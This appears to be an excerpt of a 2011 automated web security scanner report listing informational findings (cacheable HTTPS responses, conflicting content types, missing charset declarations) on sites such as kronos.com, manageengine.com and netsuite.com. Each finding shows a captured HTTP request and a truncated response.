<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...

29.22. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:54:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:53 GMT
Content-Length: 33838


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...

29.23. https://www.manageengine.com/network-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /network-performance-management.html

Request

GET /network-performance-management.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/service-desk/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:27:38 GMT
ETag: "b11e-49f3716993680"
Accept-Ranges: bytes
Cache-Control: max-age=-2170060
Expires: Thu, 31 Mar 2011 09:27:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 45342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...

29.24. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Request

GET /products/security-manager/index.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:51 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=-2247722
Expires: Wed, 30 Mar 2011 11:51:49 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...

29.25. https://www.manageengine.com/products/security-manager/security-manager-forum.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/security-manager-forum.html

Request

GET /products/security-manager/security-manager-forum.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://www.manageengine.com/products/security-manager/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 10:23:28 GMT
ETag: "256-49cc841318800"
Accept-Ranges: bytes
Cache-Control: max-age=-4845024
Expires: Mon, 28 Feb 2011 10:23:28 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

30. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
Referer: https://system.netsuite.com/pages/customerlogin.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:32 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:32 GMT
Last-Modified: Fri, 22 Apr 2011 00:09:09 GMT
NS_RTIMER_COMPOSITE: 239240273:616363742D6A6176613037392E7376616C652E6E65746C65646765722E636F6D:80
encoding: UTF-8
Content-Language: UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=969
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Content-Length: 4552


function getQueryParameter(param)
{
var idx = document.URL.indexOf(param+"=");
if (idx != -1)
{
var sidx = idx+param.length+1;
var len = document.URL.substring(sidx).indexOf("&"
...[SNIP]...
</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'>"+
            "<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=0&bglt=F2F4F6&bgmd=E0E4E8&bgdk=737A82&bgon=C1C8D2&bgoff=8492A5&bgbar=C1C8D2&tasktitletext=000000&crumbtext=000000&headertext=000000&
...[SNIP]...

31. HTML does not specify charset  previous  next
There are 29 instances of this issue:


31.1. https://customer.kronos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /

Request

GET / HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; Visitor=173%2E193%2E214%2E243; mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303740970638; s_invisit=true; s_lv=1303740970641; s_lv_s=First%20Visit; s_gpv_page=kronos%3Alabor-analysis%3Alabor-analysis-software.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.2. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Request

GET /Default.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.3. https://customer.kronos.com/portalproblems.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /portalproblems.asp

Request

GET /portalproblems.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/user/logindenied.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11576
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.4. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.5. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>
       <meta http-equiv="Content-Type" content="text/html;">
       <link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.6. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</TITLE>

<META http-equiv="Content-Type" content="text/html;">
<LINK rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.7. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

31.8. http://foreign.dt00.net/zones/zone1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone1.php

Request

GET /zones/zone1.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/top.php?site=3&cat=30&red=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:02 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 313


document.write('<a href="http://foreign.dt00.net/click.php?id=308&amp;zone=1&amp;country=4" target="_blank"><img src="http://img.dt00.net/foreign/166.gif" alt=".................." border="0" /></a><i
...[SNIP]...

31.9. http://foreign.dt00.net/zones/zone23.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone23.php

Request

GET /zones/zone23.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 502


document.write('<ul class="hmenu-1 clearfix hmactive-5 mt"><li class="tm-5"><span>......................</span></li></ul> <div class="l-block">');document.write('<a href="http://foreign.dt00.net/cli
...[SNIP]...

31.10. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blan
...[SNIP]...

31.11. http://foreign.dt00.net/zones/zone40.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone40.php

Request

GET /zones/zone40.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/right_premium.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 536


document.write('<style type="text/css"> @import "http://oth.dt00.net/css/global/global.css"; </style> <ul class="box-title cr-5"><li class="cr-5"><span>..............</span></li></ul> <div class=
...[SNIP]...

31.12. http://goods.adnectar.com/static/quantcast_1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /static/quantcast_1.html

Request

GET /static/quantcast_1.html HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adnectar_id=PObkQ021gzROKXjpBM+iAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:36 GMT
Content-Type: text/html
Content-Length: 590
Last-Modified: Fri, 22 Apr 2011 00:28:44 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

</head>

<body>

<!-- Star
...[SNIP]...

31.13. http://kino.webalta.ru/banners.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kino.webalta.ru
Path:   /banners.xml

Request

GET /banners.xml HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/sc/l/banroll.swf?xml_path=/banners.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:20:33 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3802

<?xml version="1.0" encoding="utf-8"?>
<flash_parameters copyright="anvsoftPFMTheme">
<preferences>
<golbal>
<basic_property movieWidth="620" movieHeight="348" html_title="Title" loadStyle
...[SNIP]...

31.14. http://kroogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
